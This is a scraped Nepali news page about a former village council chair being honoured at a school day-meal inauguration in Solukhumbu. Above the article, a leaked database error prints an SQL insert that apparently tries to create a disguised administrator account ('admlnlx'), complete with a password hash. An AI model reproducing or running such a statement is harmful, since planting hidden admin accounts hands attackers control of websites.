WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkY31OVcP3Z8wlLYQCvazaHX2pQKGA/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 06:55:07', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सोलुखुम्बु जिल्ला तत्तकालिन बासा गाउ विकास समितिका पूर्व अध्यक्ष जसे राईलाई सम्मान गएिको छ । माप्य दुधकोशी गाउँपालिका ३ लेम्चि स्थित जन प्रिय आधारभूत विद्यालयमा आयोजित विद्यालय दिवा खाजा उत्घाटन समारोह कार्यक्रममा राईलाई सम्मान गरिएको हो । 
रिड नेपाल सोलुखुम्बुको सहयोगमा आयोजित विद्यालय दिवा खाजा कार्यक्रम माप्य दुधकोशी गाउँपालिका भित्रका सबै विद्यालयहरुमा सञ्चालन गर्दै लाने जनाएको छ ।
माप्य दुधकोशी गाउँपालिका अध्यक्ष बुद्धिकिरण राईको प्रमुख आतिथ्य र पूर्व गा.वि.स. अध्यक्ष जसे राई र सस्थापक वि.ब्या.स.अध्यक्ष जस बहादुर राईको श्रीमति सनमाया राईको बिशिष्ट अतिथिमा सम्पन्न भएको हो ।